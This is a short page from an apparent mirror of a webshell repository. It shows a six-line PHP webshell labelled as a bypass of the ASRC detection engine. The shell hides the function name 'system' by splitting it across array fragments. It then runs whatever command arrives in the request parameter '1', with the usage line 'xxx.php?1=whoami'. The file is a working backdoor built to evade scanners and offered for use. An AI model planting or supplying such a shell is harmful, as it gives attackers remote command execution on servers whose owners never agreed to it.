mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
43c3fd24a3
from: https://zhuanlan.zhihu.com/p/550150061 usage: xxx.php?1=whoami
6 lines
152 B
PHP
6 lines
152 B
PHP
<?php
|
|
//ASRC伏魔引擎bypass
|
|
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
|
|
$a = join($result);
|
|
array_map($a,(array)$_REQUEST['1']);
|
|
?>
|